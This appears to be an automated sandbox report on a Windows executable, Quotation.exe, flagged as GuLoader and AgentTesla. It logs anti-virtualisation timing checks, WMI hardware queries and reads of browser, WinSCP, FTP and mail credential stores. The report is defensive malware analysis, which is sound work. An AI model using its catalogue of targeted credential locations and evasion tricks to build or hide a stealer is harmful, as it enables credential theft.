Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

File written: C:\Users\user\Music\antithetic.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Quotation.exe

Static file information: File size 1196832 > 1048576

Source: Quotation.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2334492638.000000000A0C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Quotation.exe

Code function: 0_2_6FF82351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FF82351

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_00150C55 push ebx; retf	6_2_00150C52
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_00150C6D push edi; retf	6_2_00150C7A
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 6_2_3B6776A8 push esp; iretd	6_2_3B6776B9

Source: C:\Users\user\Desktop\Quotation.exe

File created: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Quotation.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Quotation.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Quotation.exe	API/Special instruction interceptor: Address: A57F737
Source: C:\Users\user\Desktop\Quotation.exe	API/Special instruction interceptor: Address: 6FFF737

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Quotation.exe	RDTSC instruction interceptor: First address: A5294F9 second address: A5294F9 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F00F4876A03h 0x00000008 cmp ah, FFFFFFEEh 0x0000000b test ebx, eax 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f push esi 0x00000010 mov esi, 5BB11FD2h 0x00000015 cmp esi, 13h 0x00000018 jng 00007F00F48CDBA3h 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Quotation.exe	RDTSC instruction interceptor: First address: 6FA94F9 second address: 6FA94F9 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F00F522C823h 0x00000008 cmp ah, FFFFFFEEh 0x0000000b test ebx, eax 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f push esi 0x00000010 mov esi, 5BB11FD2h 0x00000015 cmp esi, 13h 0x00000018 jng 00007F00F52839C3h 0x0000001e pop esi 0x0000001f rdtsc

Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 38360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 380B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199985	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199875	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199766	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199641	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199531	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199422	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199295	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199184	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Window / User API: threadDelayed 7782			Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Window / User API: threadDelayed 2062			Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsuF14C.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Quotation.exe

Evaded block: after key decision

graph_0-3126

Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6812	Thread sleep count: 7782 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6812	Thread sleep count: 2062 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -98672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -98344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -98125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -98014s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -97906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -97797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -97687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -97576s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -97431s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -97325s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -97209s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -97062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -96953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -96767s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -96641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -96531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -96422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -96312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -96203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -96094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -95969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -95859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -95750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -95640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -95531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -95422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -95312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -95203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -1199985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -1199875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -1199766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -1199641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -1199531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -1199422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -1199295s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6620	Thread sleep time: -1199184s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quotation.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Quotation.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004066F7
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004065AD FindFirstFileW,FindClose,		0_2_004065AD

Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98344	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98125	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 98014	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97906	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97797	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97687	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97576	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97431	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97325	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97209	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 97062	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96953	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96767	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96641	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96531	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96422	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96312	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96203	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 96094	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 95969	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 95859	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 95750	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 95640	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 95531	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 95422	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 95312	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 95203	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199985	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199875	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199766	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199641	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199531	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199422	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199295	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 1199184	Jump to behavior

Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2780628654.0000000007C72000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Quotation.exe

API call chain: ExitProcess graph end node

graph_0-3014

Source: C:\Users\user\Desktop\Quotation.exe

Code function: 0_2_6FF82351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FF82351

Source: C:\Users\user\Desktop\Quotation.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Users\user\Desktop\Quotation.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

0_2_004036DA

Source: C:\Users\user\Desktop\Quotation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 4068, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Quotation.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 4068, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 4068, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
